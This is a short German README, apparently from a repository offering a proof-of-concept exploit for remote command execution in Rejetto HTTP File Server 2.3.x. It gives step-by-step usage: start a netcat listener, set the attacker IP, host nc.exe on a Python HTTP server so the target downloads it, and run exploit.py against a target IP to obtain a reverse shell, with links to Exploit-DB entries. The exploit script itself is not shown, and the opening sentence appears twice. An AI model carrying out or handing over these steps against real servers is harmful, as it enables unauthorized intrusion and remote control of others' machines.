
Dieses Repository enthält eine detaillierte Erklärung und einen funktionierenden PoC für Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution.
Dieses Repository enthält eine detaillierte Erklärung und einen funktionierenden poc für den Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution.
Erstellen Sie einen Netcat-Listener.
nc -lnvp 1234
Ändern Sie die Angreifer-IP zu Ihrer IP und Port.

Erstellen Sie außerdem einen HTTP-Dateiserver im selben Verzeichnis, in dem nc.exe existiert.
python -m http.server 80
python exploit.py <target-ip> <target-port>

Hinweis: Möglicherweise müssen Sie das Payload mehrmals ausführen, um eine Reverse Shell zu erhalten.
https://www.exploit-db.com/exploits/39161
https://www.exploit-db.com/exploits/34668
https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/